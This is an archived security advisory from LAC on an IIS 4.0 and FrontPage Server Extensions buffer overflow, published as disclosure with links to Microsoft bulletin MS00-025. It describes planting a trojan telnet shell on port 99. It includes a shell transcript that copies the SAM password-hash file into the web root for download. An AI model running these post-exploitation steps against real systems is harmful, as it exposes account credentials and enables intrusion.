[1][USEMAP:frame_r1_c1.gif] [frame_r1_c3.gif] [2]Japanese SNS Advisory [title2_r1_c1.gif] [3][GoIndex.gif] @ 13 [4][GoNext.gif] [5]Japanese Edition SNS Advisory No.13 IIS4.0 + FrontPage Server Extention Buffer Overflow Vulnerability Problem first discovered: Published: 19 May 2000 Last Updated: 19 May 2000 _________________________________________________________________ Overview: We could reproduce exploitation of the Buffer Overrun Vulnerability within IIS4.0 + FrontPage Server Extension (Japanese Environment) makes it possible for a remote user to execute arbitrary commands. The following pictures show snapshots of how arbitrary codes work on the target. Figure1: Testing Tool Figure 2: Executing remote commands via injected codes Figure 3: Examle of commands execution [13_1.gif] Figure1: Testing Tool Sending "ncx99.exe" file, The trojan horse that will open 99/tcp port of the machine. [13_2.gif] Figure 2: Executing remote commands via injected codes The injected code is a tiny telnet server. Users may access to the target by connecting to tcp/99 via any telnet clients. C:\> C:\>ipconfig <--executing ipconfig ipconfig Windows NT IP Configuration Ethernet adapter E100B1: IP Address. . . . . . . . . . . . . . . : 172.16.99.99 Subnet Mask . . . . . . . . . . . . . : 255.255.0.0 Default Gateway . . . . . . . . . . : C:\> C:\>route print <-- executing route print route print ============================================================ Interface List 0x1 ........................................... MS TCP Loopback interface 0x2 ...00 90 27 44 c5 fd ...... Intel(R) PRO PCI Adapter ============================================================ ============================================================ Active Routes: Network Destination Netmask Gateway Interface Metric 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1 127.16.0.0 255.255.0.0 172.16.99.99 172.16.99.99 1 172.16.99.99 255.255.255.255 127.0.0.1 127.0.0.1 1 172.16.255.255 255.255.255.255 172.16.99.99 172.16.99.99 1 224.0.0.0 224.0.0.0 172.16.99.99 172.16.99.99 1 255.255.255.255 255.255.255.255 172.16.99.99 172.16.99.99 1 D:\>net start "World Wide Web Publishing Service" net start "World Wide Web Publishing Service" World Wide Web Publishing Service is starting World Wide Web Publishing Service was started successfully D:\> D:\>cd inetpub\wwwroot cd inetpub\wwwroot D:\Inetpub\wwwroot> D:\Inetpub\wwwroot>copy d:\winnt\repair\sam._ . copy d:\winnt\repair\sam._ . 1 file(s) copied. It is possible to access to sam._ by browser. Figure 3: Example of command execution Starting "World Wide Wev Publishing Service" and copying d:\winnt\repair\sam._ file including usernames and hashed passwords to root directory (d:\Inetpub\wwwroot). Requesting a URL with "sam._" file will disclose user names and hashed passwords. Relevant URL: Security Bulletin [MS00-025] [6]http://www.microsoft.com/technet/security/bulletin/ms00-025.asp Microsoft Security Bulletin (MS00-025): Frequently Asked Questions [7]http://www.microsoft.com/technet/security/bulletin/fq00-025.asp Disclaimer: All information in these advisories are subject to change without any advanced notices neither mutual consensus, and each of them is released as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences caused by applying those information. _________________________________________________________________ Copyright(c) 1995-2002 Little eArth Corporation References 1. LYNXIMGMAP:http://www.lac.co.jp/security/english/snsadv_e/13_e.html#r1_c1Map 2. http://www.lac.co.jp/security/index.html 3. http://www.lac.co.jp/security/english/snsadv_e/index.html 4. http://www.lac.co.jp/security/english/snsadv_e/14_e.html 5. http://www.lac.co.jp/security/intelligence/SNSAdvisory/13.html 6. http://www.microsoft.com/technet/security/bulletin/ms00-025.asp 7. http://www.microsoft.com/technet/security/bulletin/fq00-025.asp